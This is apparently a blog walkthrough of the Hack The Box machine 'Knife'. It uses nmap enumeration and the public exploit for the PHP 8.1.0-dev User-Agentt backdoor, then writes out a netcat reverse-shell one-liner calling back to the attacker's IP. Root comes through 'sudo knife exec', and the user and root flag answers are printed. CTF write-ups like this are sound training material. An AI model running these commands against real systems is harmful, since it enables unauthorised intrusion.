top of page

Knife


Enumeration


As usual, let's start with nmap:

nmap -sV -sC 10.10.10.242

curl -I 10.10.10.242

Let's google php/8.1.0-dev exploit and see what we can find.

We find this exploit on exploit-db: https://www.exploit-db.com/exploits/49933


It says:

"An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header. The following exploit uses the backdoor to provide a pseudo shell on the host."

Let's download the exploit to our VM


python3 49933.py

Enter the url of the target machine

We got the shell!


id

The shell is not very interactive, it doesn't respond to the cd command, but we can use this trick:


From your VM, open a new command prompt and type

nc -lnvp 1234

Now from the target's machine type:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 1234 >/tmp/f

Now go back to your netcat (nc) if you've got a shell!

python3 -c 'import pty;pty.spawn("/bin/bash")'

Now we have a proper shell!


219a816d297ab93af1acdf0989cbe5c4


Congratulations! You got the user flag!



Now let's try to get the root flag:

Access is denied so we need to escalate our privileges.



Privilege Escalation

sudo -l

This means the command knife can be called as root without providing any passwords!


After googling how to use knife, we come up with this command:


sudo knife exec -E 'system("cat /root/root.txt")'

286187c400154744a5fe9a38e9229798


Congratulations! You got the root flag!

134 views0 comments

Recent Posts

See All

Previse

Backdoor

Lame

Comments

Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page